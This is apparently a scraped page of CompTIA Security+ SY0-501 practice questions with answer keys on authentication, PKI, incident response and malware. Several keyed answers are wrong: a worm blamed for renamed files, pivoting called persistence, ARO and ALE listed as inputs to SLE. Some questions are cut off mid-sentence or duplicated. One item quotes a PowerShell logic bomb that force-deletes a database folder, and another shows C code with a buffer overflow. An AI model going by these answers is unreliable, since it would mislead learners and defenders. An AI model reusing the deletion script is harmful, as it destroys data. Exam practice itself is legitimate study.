SY-501 9-20-2018 Exam Questions FROM K:

¡Supera tus tareas y exámenes ahora con Quizwiz!

After a significant amount of hiring, an organization would like to simplify the connection process to its wireless network for employees while ensuring maximum security. The Chief Information Officer (CIO) wants to get rid of any shared network passwords and require employees to use their company credentials when connecting. Which of the following should be implemented to BEST meet this requirement? A. PSK B. 802.1X C. CCMP D. TKIP

B. 802.1X

Which of the following metrics are used to calculate the SLE? (Select TWO) A. ROI B. ARO C. ALE D. MTBF E. MTTF F. TCO

B. ARO C. ALE

A software developer is concerned about DLL hijacking in an application being written. Which of the following is the MOST viable mitigation measure of this type of attack? A. The DLL of each application should be set individually B. All calls to different DLLs should be hard-coded in the application C. Access to DLLs from the Windows registry should be disabled D. The affected DLLs should be renamed to avoid future hijacking

B. All calls to different DLLs should be hard-coded in the application

Which of the following is the BEST choice for a security control that represents a preventive and corrective logical control at the same time? A. Security awareness training B. Antivirus C. Firewalls D. Intrusion detection system

B. Antivirus

A security analyst is inspecting the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports include the following critical-rated vulnerability: Title: Remote Command Execution vulnerability in web server Rating: Critical (CVSS 10.0) Threat actor: any remote user of the web server Confidence: certain Recommendation: apply vendor patches Which of the following actions should the security analyst perform FIRST? A. Escalate the issue to senior management. B. Apply organizational context to the risk rating. C. Organize for urgent out-of-cycle patching. D. Exploit the server to check whether it is a false positive.

B. Apply organizational context to the risk rating.

Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file? A. Unencrypted credentials B. Authentication issues C. Weak cipher suite D. Permission issues

B. Authentication issues

An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code: void foo (char *bar) { car random_user_input[12]; stropy (random_user_input, bar); } Which of the following vulnerabilities is present? A. Bad memory pointer B. Buffer overflow C. Integer overflow D. Backdoor

B. Buffer overflow

A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue? A. SSL B. CRL C. PKI D. ACL

B. CRL

While troubleshooting a client application connecting to the network, the security administrator notices the following error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is valid? A. PKI B. CRL C. CSR D. IPSec

B. CRL

A security administrator needs to address the following audit recommendations for a public-facing SFTP server: -Users should be restricted to upload and download files to their own home directories only -Users should not be allowed to use interactive shell login Which of the following configuration parameters should be implemented? (Select TWO) A. PermitTunnel B. ChrootDirectory C. PermitTTY D. Allow TcpForwarding E. IgnoreRhosts

B. ChrootDirector C. PermitTTY

Which of the following security controls provides an alternative solution to a control that would be considered unpractical or excessively expensive? A. Deterrent B. Compensating C. Technical D. Administrative

B. Compensating

A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the following SAN features might have caused the problem? A. Storage multipaths B. Deduplication C. iSCSI initiator encryption D. Data snapshots

B. Deduplication

During a routine review of firewall log reports, a security technician notices multiple successful logins for the admin user during unusual hours. The technician contacts the network administrator, who confirms the logins were not related to the administrator's activities. Which of the following is the MOST likely reason for these logins? A. Firewall maintenance service windows were scheduled B. Default credentials were still in place C. The entries in the log were caused by the file integrity monitoring system D. A blue team was conducting a penetration test on the firewall

B. Default credentials were still in place

A CSIRT has completed restoration procedures related to a breach of sensitive data is creating documentation used to improve future response activities and coordination among team members. Which of the following information would be MOST beneficial to include in lessons learned documentation? (Select TWO) A. A summary of approval policy changes based on the outcome of the incident. B. Details of any communication challenges that hampered initial response times C. Details of man-hours and related costs associated with the breach, including lost revenue D. Details regarding system restoration activities completed during the response activity E. Suggestions for potential areas of focus during quarterly training activities F. Suggestions of tools that would provide improved monitoring and auditing of system access

B. Details of any communication challenges that hampered initial response times D. Details regarding system restoration activities completed during the response activity

A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk? A. Enable CHAP B. Disable NTLM C. Enable Kerebos D. Disable PAP

B. Disable NTLM

A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issue could occur if left unresolved? (Select TWO) A. MITM attack B. DoS attack C. DLL injection D. Buffer overflow E. Resource exhaustion

B. DoS attack E. Resource exhaustion

A company has been experiencing many successful email phishing attacks, which have been resulting in the compromise of multiple employees' accounts when employees reply with their credentials. The security administrator has been notifying each user and resetting the account passwords when accounts become compromised. Regardless of this process, the same accounts continue to be compromised even when the users do not respond to the phishing attacks. Which of the following are MOST likely to prevent similar account compromises? (Select TWO). A. Enforce password reuse limitations. B. Enable password complexity. C. Reset the account security questions. D. Configure account lockout. E. Implement time-of-day restrictions.

B. Enable password complexity. D. Configure account lockout.

Upon entering an incorrect password, the logon screen displays a message informing the user that the password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices? A. Input validation B. Error handling C. Obfuscation D. Data exposure

B. Error handling

A security analyst has received the following alert snippet from the HIDS appliance: PROTOCOL SIG SRC.PORT DST.PORT TCP XMAS SCAN 192.168.1.1:1091 192.168.1.2:8891 TCP XMAS SCAN 192.168.1.1:649 192.168.1.2:9001 TCP XMAS SCAN 192.168.1.1:2264 192.168.1.2:6455 TCP XMAS SCAN 192.168.1.1:3464 192.168.1.2:8744 Given the above logs, which of the following is the cause of the attack? A. The TCP ports on destination are all open. B. FIN, URG, and PSH flags are set in the packet header. C. TCP MSS is configured improperly. D. There is improper Layer 2 segmentation.

B. FIN, URG, and PSH flags are set in the packet header.

Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions infrastructure under its own domain infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources? A. Attestation B. Federation C. Single sign-on D. Kerberos

B. Federation

After attempting to harden a web server, a security analyst needs to determine if an application remains vulnerable to SQL injection attacks. Which of the following would BEST assist the analyst in making this determination? A. tracert B. Fuzzer C. nslookup D. Nmap E. netcat

B. Fuzzer

Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test? A. Black box B. Gray box C. Credentialed D. White box

B. Gray box

An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented? A. Use a camera for facial recognition B. Have users sign their name naturally C. Require a palm geometry scan D. Implement iris recognition

B. Have users sign their name naturally

Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement? A. Role-based access control B. Honeypot C. Rule-based access control D. Password cracker

B. Honeypot

A security engineer is working with the CSIRT to investigate a recent breach of client data to improper use of cloud-based tools. The engineer finds that an employee was able to access cloud-based storage platform from the office and upload data for the purposes of doing work form home after hours. Such activity is prohibited by policy, but no preventative control is in place to block such activities Which of the following controls would have prevented this breach? A. Network-based IPS B. Host-based DLP C. Host-based IDS D. NAC using TACACS+

B. Host-based DLP

An organization wants to move its operations to the cloud. The organization's systems administrator will still maintain control of the servers, firewalls and load balancers in the cloud environment. Which of the following models is the organization considering? A. SaaS B. IaaS C. PaaS D. MaaS

B. IaaS

After an identified security breach, an analyst is tasked to initiate the IR process. Which of the following is the NEXT step the analyst should take? A. Recovery B. Identification C. Preparation D. Documentation E. Escalation

B. Identification

forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO). A. Implement a reverse proxy. B. Implement an email DLP. C. Implement a spam filter. D. Implement a host-based firewall. E. Implement a HIDS.

B. Implement an email DLP. C. Implement a spam filter.

As part of a new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this? A. Require the use of an eight-character PIN B. Implement container C. Require annual AUP sign-off. D. Use geofencing tools to unlock devices while on the premises.

B. Implement container

A security analyst identified an SQL injection attack. Which of the following is the FIRST step in remediating the vulnerability? A. Implement stored procedures B. Implement input validations C. Implement proper error handling D. Implement a WAF

B. Implemented input validations

Which of the following are the primary differences between an incremental and differential backup? (Select TWO). A. Incremental backups take more time to complete. B. Incremental backups take less time to complete. C. Differential backups only back up files since the last full backup. D. Differential backups use less disk space on the storage drive. E. Incremental backups are less secure than differential backups. F. Differential backups are faster than incremental backups

B. Incremental backups take less time to complete. C. Differential backups only back up files since the last full backup.

Which of the following threats has sufficient knowledge to cause the MOST danger to an organization? A. Competitors B. Insiders C. Hacktivists D. Script kiddies

B. Insiders

A company is looking for an authentication protocol that uses tickets and time stamps to ensure the validity of requests and prevent against replay attacks. Which of the following would be BEST suited to meet this requirement? A. TACACS+ B. Kerberos C. RADIUS D. MSCHAP

B. Kerberos

The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks. Which of the following would have allowed the security team to use historical information to protect against the second attack? A. Key risk indicators B. Lessons learned C. Recovery point objectives D. Tabletop exercise

B. Lessons learned

A security administrator is configuring a RADIUS server for wireless authentication. The configuration must ensure client credentials are encrypted end-to-end between the client and the authenticator. Which of the following protocols should be configured on the RADIUS server? (Select TWO) A. PAP B. MSCHAP C. PEAP D. NTLM E. SAML

B. MSCHAP C. PEAP

Which of the following refers to the term used to restore a system to its operational state? A. MTBF B. MTTR C. RTO D. RPO

B. MTTR

A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control? A. Discretionary access control B. Mandatory access control C. Role-based access control D. Rule-based access control

B. Mandatory access control

Which of the following could help detect trespassers in a secure facility? (Select TWO) A. Faraday cages B. Motion-detection sensors C. Tall, chain-link fencing D. Security guards E. Smart cards

B. Motion-detection sensors D. Security guards

security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select TWO) A. Privileged-user certificated were used to scan the host B. Non-applicable plug ins were selected in the scan policy C. The incorrect audit file was used D. The output of the report contains false positives E. The target host has been compromised

B. Non-applicable plug ins were selected in the scan policy D. The output of the report contains false positives

Compared to a non-credentialed scan, which of the following is a unique result of a credentialed scan? A. Uncommon open ports on the host B. Outdated software versions on the host C. Self-signed certificate on the host D. Fully qualified domain name

B. Outdated software versions on the host

A security administrator wants to implement least privilege access for a network share that stores sensitive company data. The organization is particularly concerned with the integrity of data and implementing discretionary access control. The following controls are available: Read = A user can read the content of an existing file. Write = A user can modify the content of an existing file and delete an existing file. Create = A user can create a new file and place data with the file. A missing control means the users does not have that access. Which of the following configurations provides the appropriate control to support the organization's requirements? A. Owners: Read, Write, Create Group Members: Read, Write Others: Read, Write B. Owners: Write, Create Group Members: Read, Write, Create Others: Read C. Owners: Read, Write Group Members: Read, Create Others: Read, Create D. Owners: Write, Create Group Members: Read, Create Others: Read, Write, Create

B. Owners: Write, Create Group Members: Read, Write, Create Others: Read

Which of the following are used to increase the computing time it takes to brute force a password using an offline attack? (Select TWO) A. XOR B. PBKDF2 C. bcrypt D. HMAC E. RIPEMD

B. PBKDF2 C. bcrypt

system or its data. Which of the following BEST describes the vulnerability scanning concept performed? A. Aggressive scan B. Passive scan C. Non-credentialed scan D. Compliance scan

B. Passive scan

A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select TWO) A. Time-of-day restrictions B. Password complexity C. Location-based authentication D. Group-based access control E. Standard naming convention

B. Password complexity D. Group-based access control

The Chief Executive Officer (CEO) has asked a junior technician to create a folder in which the CEO can place sensitive files. The technician later finds the information within these files is the topic of conversation around the company. When this information gets back to the CEO, the technician is called in to explain. Which of the following MOST likely occurred? A. Access violations B. Permission issues C. Data exfiltration D. Certificate issues

B. Permission issues

A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host? A. Backdoor B. Pivoting C. Persistence D. Logic bomb

B. Pivoting

connectivity to guest users. The security engineer is concerned with unauthorized users accessing sensitive systems that also require network connectivity. Given the engineer's requirements, which of the following is the BEST method of securing the sensitive systems? A. Place the sensitive systems in an isolated VLAN. B. Place an air gap around the sensitive systems. C. Virtualize the guest wireless infrastructure. D. Place the guest WAPs on a honeypot.

B. Place an air gap around the sensitive systems.

A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware binaries, the technician finds each has a different has associated with it. Which of the following types of malware is MOST likely present in the environment? A. Trojan B. Polymorphic worm C. Rootkit D. Logic bomb E. Armored virus

B. Polymorphic worm

Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1x client on their mobile devices? A. Shibboleth B. RADIUS federation C. SAML D. OAuth E. OpenlD connect

B. RADIUS federation

When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select TWO) A. MAC address table B. Retina scan C. Fingerprint scan D. Two-factor authentication E. CAPTCHA F. Password string

B. Retina scan C. Fingerprint scan

An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue? A. Firewall; implement an ACL on the interface B. Router; place the correct subnet on the interface C. Switch; modify the access port to trunk port D. Proxy; add the correct transparent interface

B. Router; place the correct subnet on the interface

While trying to manage a firewall's ACL, a security administrator (User 3) receives an "Access Denied" error. The manager reviews the following information: Secuirty_admins: User 1, User 2 Firewall access: ACL Read: Security_admins ACL Write: Security_admins Reboot: Managers Audit: User 3 Which of the following is preventing the administrator from managing the firewall? A. Mandatory access control B. Rule-based access control C. Group-based access control D. Attribute-based access control

B. Rule-based access control

A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select TWO) A. TOPT B. SCP C. FTP over a non-standard pot D. SRTP E. Certificate-based authentication F. SNMPv3

B. SCP E. Certificate-based authentication

A manager wants to distribute a report to several other managers within the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE) A. S/MIME B. SSH C. SNMPv3 D. FTPS E. SRTP F. HTTPS G. LDAPS

B. SSH D. FTPS F. HTTPS

manager wants to distribute a report to several other managers with the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE) A. S/MIME B. SSH C. SNMPv3 D. FTPS E. SRTP F. HTTPS G. LDAPS

B. SSH D. FTPS F. HTTPS

A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements? (Select TWO) A. Multifactor authentication B. SSO C. Biometrics D. PKI E. Federation

B. SSO E. Federation

Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications? A. Staging environment B. Sandboxing C. Secure baseline D. Trusted OS

B. Sandboxing

A consumer purchases an exploit from the dark web. The exploit targets the online shopping cart of popular website, allowing the shopper to modify the price of an item at checkout. Which of the following BEST describes this type of user? A. Insider B. Script kiddie C. Competitor D. Hacktivist E. APT

B. Script kiddie

Joe, a senior systems administrator, must leave for a family emergency. While Joe is absent, another systems administrator discovers Joe stole confidential company information. Which of the following organizational procedures would have detected this breach sooner? A. Background check B. Separation of duties C. Job rotation D. Rules of behavior E. Non-disclosure agreement

B. Separation of duties

A security analyst is securing a PACS. One of the requirements is network isolation with no access to the Internet or networked computers. Given this scenario, which of the following should the analyst implement to BEST address this requirement? A. Set up a firewall rule blocking ports 80 and 443. B. Set up an air-gapped environment. C. Set up a router and configure an ACL. D. Set up a segmented VLAN.

B. Set up an air-gapped environment.

An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal? A. Transitive trust B. Single sign-on C. Federation D. Secure token

B. Single sign-on

An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described? A. Replay B. Spoofing C. DNS poisoning D. Client-side attack

B. Spoofing

A system administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites? A. Extended domain validation B. TLS host certificate C. OCSP stapling D. Wildcard certificate

B. TLS host certificate

An organization wants to ensure servers and applications can be deployed rapidly, in a consistent manner, and allow for flexible configuration changes. Which of the following should the organization use to make this process repeatable across multiple locations? A. Redundancy B. Templates C. Snapshots D. Elasticity E. Configuration validation

B. Templates

A network administrator is downloading the latest software for the organization's core switch. The downloads page allows users to view the checksum values for the available files. The network administrator is shows the following when viewing the checksum values for the TB_16.swi.file: Checksum values for the downloaded file: MD5 d50b2b04cfb168eec8 SHA1 6a49065705a43de83dfa9e94 SHA256 7123fb644fbabdda6a73f6e6bc833e2cf12 After downloading the file, the network administrator runs a command to show the following output: Algorithm Hash Patch SHA256 5fdbbfb644fbabdda000006e6bc833e2c968 C:\Users\bsmith\YB_16.swi SHA256 64ccbfbaf4fb96dda6a7373e9bcf62e3c244 C:\Users\bsmith\AA_15.swi SHA1 12fec6aabc9ce87fee654abc C:\Users\bsmith\KB_09.swi MD5 5fdbbfb644fbadda6 C:\Users\bsmith\KA_01.swi Which of the following can be determined from the above output? A. The download file was only hashed with SHA-256. B. The download file has been corrupted or tampered with. C. The download file should not be used because it was not hashed with MD5. D. The download file should not be used because its hash differs from the hash of AA_15.swi

B. The download file has been corrupted or tampered with.

Emails containing the URL of a popular technology forum were sent from an external source to a research and development company. When users at the company load the page, malware infects their system. Which of the following BEST describes this scenario? A. The email is intended to spread information that is a hoax. B. The email is intended to bait users into accessing a watering hole. C. The email is intended to promote shoulder surfing. D. The email is intended to disrupt productivity.

B. The email is intended to bait users into accessing a watering hole.

A technician receives a device with the following anomalies: Frequent pop-up ads Show response-time switching between active programs Unresponsive peripherals The technician reviews the following log file entries: File Name Source MD5 Target MD5 Status antivirus.exe F794F21CD33E4F57890DDEA5CF267ED2 F794F21CD33E4F57890DDEA5CF267ED2 Automatic iexplore.exe 7FAAF21CD33E4F57890DDEA5CF29CCEA AA87F21CD33E4F57890DDEAEE2197333 Automatic service.exe 77FF390CD33E4F57890DDEA5CF28881F 77FF390CD33E4F57890DDEA5CF28881F Manual USB.exe E289F21CD33E4F57890DDEA5CF28EDC0 E289F21CD33E4F57890DDEA5CF28EDC0 Stopped Based on the above output, which of the following should be reviewed? A. The web application firewall B. The file integrity check C. The data execution prevention D. The removable media control

B. The file integrity check

then finds this file to be in the preupdate area of the OS, which indicated it was pushed from the central patch system. File: winx86_adobe_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 Administrator pulls a report from the patch management system with the following output: Install Date Package Name Target Device Hash 10/10/2017 java_11.2_x64.exe HQ PC's 01ab28bbde63aa879b35bba62cdea282 10/10/2017 winx86_adobe_flash_upgrade.exe HQ PC's 99ac28bede43ab86b853ba62c4ea243 Given the above output, which of the following MOST likely happened? A. The file was corrupted after it left the patch system B. The file was infected when the patch manager downloaded it C. The file was not approved in the application whitelist system D. The file was embedded with a logic bomb to evade detection

B. The file was infected when the patch manager downloaded it

Due to regulatory requirements, server in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization? A. The server should connect to external Stratum 0 NTP servers for synchronization B. The server should connect to internal Stratum 0 NTP servers for synchronization C. The server should connect to external Stratum 1 NTP servers for synchronization D. The server should connect to external Stratum 1 NTP servers for synchronization

B. The server should connect to internal Stratum 0 NTP servers for synchronization

A security analyst is acquiring data from a potential network incident. Which of the following evidence is the analyst MOST likely to obtain to determine the incident? A. Volatile memory capture B. Traffic and logs C. Screenshots D. System image capture

B. Traffic and logs

A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details: Certificate 1 Certificate Path: Geotrust Global CA *company.com Certificate 2 Certificate Path: *company.com Which of the following would resolve the problem? A. Use a wildcard certificate. B. Use certificate chaining. C. Use a trust model. D. Use an extended validation certificate.

B. Use certificate chaining.

A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now? A. Agile B. Waterfall C. Scrum D. Spiral

B. Waterfall

A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process? A. Restore lost data from a backup. B. Wipe the system. C. Document the lessons learned. D. Determine the scope of impact.

B. Wipe the system.

An employee is having issues when attempting to access the files on a laptop. The machine was previously running slow, and many files were not accessible. The employee is not able to access the hard drive the next day, and all file names were changed to some random names. Which of the following BEST represents what compromised the machine? A. Ransomware B. Worm C. Crypto-malware D. RAT

B. Worm

When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are: A. escalating privilege B. becoming persistent C. fingerprinting D. pivoting

B. becoming persistent

Vendor diversity is considered an architectural best practice because: A. it prevents vulnerabilities from spreading from device to device in a crisis B. it mitigates the risk of a programming flaw affecting the entire architecture C. it allows for more user training to be conducted on different equipment D. it transfers the risk associated with vulnerable devices to multiple vendors

B. it mitigates the risk of a programming flaw affecting the entire architecture

An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 PCs active on the network. the Chief Information Security Officer (CISO) suggests that the organization employ desktop imaging technology for such a large scale upgrade. Which of the following is a security benefit of implementing an imaging solution? A. it allows for faster deployment B. it provides a consistent baseline C. It reduces the number of vulnerabilities D. It decreases the boot time

B. it provides a consistent baseline

Which of the following scenarios BEST describes an implementation of non-repudiation? A. A user logs into a domain workstation and access network file shares for another department B. A user remotely logs into the mail server with another user's credentials C. A user sends a digitally signed email to the entire finance department about an upcoming meeting D. A user access the workstation registry to make unauthorized changes to enable functionality within an application

C. A user sends a digitally signed email to the entire finance department about an upcoming meeting

A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using? A. Escalation of privilege B. SQL injection C. Active reconnaissance D. Proxy server

C. Active reconnaissance

When sending messages using symmetric encryption, which of the following must happen FIRST? A. Exchange encryption key B. Establish digital signatures C. Agree on an encryption method D. Install digital certificates

C. Agree on an encryption method

Employees need to log onto the desktops' local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this? A. Put the desktops in the DMZ. B. Create a separate VLAN for the desktops. C. Air gap the desktops. D. Join the desktops to an ad-hoc network.

C. Air gap the desktops.

A member of the admins group reports being unable to modify the "changes" file on a server. The permissions on the file are as follows: Permissions User Group File -rwxrw-r--+ Admins Admins changes Based on the output above, which of the following BEST explains why the user is unable to modify the "changes" file? A. The SELinux mode on the server is set to "enforcing." B. The SELinux mode on the server is set to "permissive." C. An FACL has been added to the permissions for the file. D. The admins group does not have adequate permissions to access the file.

C. An FACL has been added to the permissions for the file.

Which of the following encryption methods does PKI typically use to securely protect keys? A. Elliptic curve B. Digital signatures C. Asymmetric D. Obfuscation

C. Asymmetric

Which of the following access management concepts is associated with file permissions? A. Authentication B. Accounting C. Authorization D. Identification

C. Authorization

A company has a data classification system with definitions for "Private" and "Public". the company's security policy outlines how data should be protected based on type. The company recently added data type "Proprietary". Which of the following is the MOST likely reason the company added this data type? A. Reduced cost B. More searchable data C. Better data classification D. Expanded authority of the privacy officer

C. Better data classification

A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO) A. Install an additional firewall B. Implement a redundant email server C. Block access to personal email on corporate systems D. Update the X.509 certificates on the corporate email server E. Update corporate policy to prohibit access to social media websites F. Review access violation on the file server

C. Block access to personal email on corporate systems E. Update corporate policy to prohibit access to social media websites

Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? A. Pivoting B. Process affinity C. Buffer overflow D. XSS

C. Buffer overflow

The IT department is deploying new computers. To ease the transition, users will be allowed to access their old and new systems. The help desk is receive reports that users are experiencing the following error when attempting to log in their previous system: Logon Failure: Access Denied Which of the following can cause the issue? A. Permission issues B. Access violations C. Certificate issues D. Misconfigured devices

C. Certificate issues

Which of the following controls allows a security guard to perform a post-incident review? A. Detective B. Preventive C. Corrective D. Deterrent

C. Corrective

A vulnerability scan is being conducted against a desktop system. The scan is looking for the files, versions, and registry values, known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed? A. Non-intrusive B. Authenticated C. Credentialed D. Active

C. Credentialed

Which of the following is an asymmetric function that generates a new and separate key every time it runs? A. RSA B. DSA C. DHE D. HMAC E. PBKDF2

C. DHE

An employee has been writing a secure shell around software used to secure executable files. The employee has conducted the appropriate self-test and is ready to move the software into the next environment. Within which of the following environments is the employee currently working? A. Staging B. Test C. Development D. Production

C. Development

An auditor confirms the risk associated with a Windows-specific vulnerability, which was discovered by the company's security tool, does not apply due ot the server running a LInux OS. Which of the following does this BEST describe? A. Inherent risk B. Attack vector C. False positive D. Remediation

C. False positive

A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises? A. Air gap B. Infrared detection C. Faraday cage D. Protected distributions

C. Faraday cage

The Chief Information Security Officer (CISO) of an organization has tasked the security analysis team with researching and developing a multifactor authentication alternative to the existing single-factor version. The team decides that multifactor, for this organization, will mean three separate and distinct authentication methods. Which of the following options BEST meets this requirement? A. Retina scan, blood sample, token B. Token, certificate, voice recognition C. Fingerprint, token, challenge question D. PIV, token, challenge question

C. Fingerprint, token, challenge question

A Chief Information Security Officer (CISCO) is concerned about insider threats compromising credentials related to service accounts on internal servers. A security analyst is tasked with developing a solution that will allow for the collection and analysis of log data in a simulated environment, which represents the production environment. Which of the following solutions would BEST satisfy the CISO's requirements? A. Bastion host B. Evil Twin C. Honeynet D. Vampire tap E. Script kiddie

C. Honeynet

Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and notices the following output: 2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE 2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVE Which of the following is MOST likely preventing Ann from accessing the application from the desktop? A. Web application firewall B. DLP C. Host-based firewall D. UTM E. Network-based firewall

C. Host-based firewall

A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing? A. Phishing B. Shoulder surfing C. Impersonation D. Dumpster diving

C. Impersonation

Which of the following BEST implements control diversity to reduce the risks associated with the authentication of employees into company resources? A. Enforcing the use of something you know and something you have for authentication B. Requiring employees to sign the company's password and acceptable use policies C. Implementing LDAP authentication for some systems and RADIUS authentication for others D. Publishing a password policy and enforcing password requirements via a GPO

C. Implementing LDAP authentication for some systems and RADIUS authentication for others

To help prevent against an SQL injection, which of the following functions should the application developer implement? A. Error handling B. Code signing C. Input validation D. Model verification

C. Input validation

A security analyst is securing smartphones and laptops for a highly mobile workforce. Priorities include: Remote wipe capabilities Geolocation services Patch management and reporting Mandatory screen locks Ability to require passcodes and pins Ability to require encryption Which of the following would BEST meet these requirements? A. Implementing MDM software B. Deploying relevant group policies to the devices C. Installing full device encryption D. Removing administrative rights to the devices

C. Installing full device encryption

A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage? A. Non-intrusive credentialed scan B. Non-intrusive non-credentialed scan C. Intrusive credentialed scan D. Intrusive non-credentialed scan

C. Intrusive credentialed scan

A security manager discovers the most recent vulnerability scan report illustrates low-level, non-critical findings. Which of the following scanning concepts would BEST report critical threats? A. Non-credential scan B. Compliance scan C. Intrusive scan D. Application scan

C. Intrusive scan

A network administrator receives a support ticket from the security operations team to implement secure access to the domain. The support ticket contains the following information: -Source: 192.168.1.127 -Destination:10.112.10.8 -Protocol: TCP -Ports: 636 -Time-of-day restriction: None -Proxy bypass required: Yes" Which of the following is being requested to be implemented? A. DNSSEC B. S/MIME C. LDAPS D. RDP

C. LDAPS

The Chief Information Security Officer (CISO) of a university is concerned about potential transmission of usernames and passwords in cleartext when authenticating to a directory server. Which of the following would BEST mitigate the CISO's concerns? A. SFTP B. SNMPv3 C. LDAPS D. SMB

C. LDAPS

A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server: $members = GetADGroupMemeber -Identity "Domain Admins" -Recursive | Select - ExpandProperty name if ($members -notcontains "JohnDoe"){ Remove-Item -path C:\Database -recurse -force }W hich of the following did the security administrator discover? A. Ransomeware B. Backdoor C. Logic bomb D. Trojan

C. Logic bomb

A security specialist must confirm file backups match the original copy. Which of the following should the security specialist use to accomplish the objective? A. AES B. 3ES C. MD5 D. RSA

C. MD5

Which of the following is used to validate the integrity of data? A. CBC B. Blowfish C. MD5 D. RSA

C. MD5

An audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability? A. Faraday cage B. Air gap C. Mantrap D. Bollards

C. Mantrap

A security team has deployed a new UTM to connect different segments of the corporate network. In addition to the UTM, each host has its own firewall and HIPS. The new UTM implements many of the same protections as the host-based firewall and HIPS, but the security team plans to leave both of these protections in place. Which of the following BEST describes the reason for this redundancy? A. Having multiple security devices can result in faster performance. B. The UTM cannot protect against threats from outside the network. C. Multiple forms of protection is preferred over single points of failure. D. A UTM cannot perform malware analysis, but a HIPS can.

